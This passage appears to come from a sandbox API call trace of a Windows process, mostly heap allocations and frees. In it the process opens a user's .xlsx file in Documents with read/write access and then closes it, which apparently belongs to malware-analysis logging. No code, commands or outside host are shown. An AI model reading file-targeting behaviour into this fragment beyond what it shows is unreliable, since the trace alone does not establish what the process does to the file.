0x759a53c6 [0176.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0176.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0176.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0176.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0176.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0176.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0176.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0176.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0176.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0176.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0176.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0176.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0176.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0176.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.xlsx", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0176.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0176.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.xlsx", cchWideChar=56, lpMultiByteStr=0x90ad98, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.xlsx", lpUsedDefaultChar=0x0) returned 56 [0176.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0176.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0176.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0176.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0176.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0176.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0176.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0176.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0176.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0176.627] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ukjh6aaskg.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0176.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0176.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0176.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0176.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0176.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0176.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0176.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0176.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0176.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0176.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0176.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0176.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0176.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0176.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0176.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=56, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0176.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0176.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=56, lpWideCharStr=0x906f38, cchWideChar=56 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.xlsx") returned 56 [0176.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0176.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0176.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0176.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0176.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0176.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0176.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0176.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0176.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0176.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0176.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0176.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0176.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0176.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0176.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0176.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0176.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0176.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0176.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0176.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0176.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0176.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0176.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0176.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0176.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0176.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0176.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0176.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0176.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0176.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0176.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0176.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0176.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0176.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0176.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0176.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0176.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0176.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0176.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0176.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0176.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0176.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0176.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0176.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0176.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0176.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0176.633] FreeLibrary (hLibModule=0x75990000) returned 1 [0176.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0176.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0176.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0176.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0176.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0176.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0176.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0176.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0176.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0176.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0176.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0176.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0176.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0176.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0176.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0176.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0176.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0176.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0176.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0176.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0176.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0176.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0176.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0176.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0176.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0176.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0176.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0176.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0176.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0176.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0176.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0176.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0176.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0176.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0176.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0176.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0176.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0176.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0176.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0176.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0176.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0176.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0176.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0176.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0176.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0176.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0176.635] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0176.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0176.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0176.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0176.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0176.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0176.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0176.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0176.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0176.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0176.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0176.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0176.636] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0176.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0176.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0176.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0176.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0176.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0176.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0176.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0176.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0176.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0176.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0176.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0176.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0176.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0176.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0176.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0176.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0176.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0176.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0176.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0176.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0176.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0176.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0176.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0176.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0176.637] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0176.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0176.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0176.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0176.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0176.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0176.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0176.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0176.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0176.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0176.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0176.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0176.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0176.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0176.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0176.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0176.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0176.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0176.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0176.638] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0176.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0176.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0176.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0c0 [0176.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba0c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0176.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0176.638] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0176.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0176.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0176.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0176.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0176.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0176.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0176.638] CloseHandle (hObject=0x120) returned 1 [0176.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0176.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0176.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0176.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0176.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0176.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0176.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0176.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0176.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0176.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0176.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0176.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0176.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0176.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0176.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0176.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0176.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0176.645] FreeLibrary (hLibModule=0x75990000) returned 1 [0176.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0176.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0176.645] HeapFree (in: 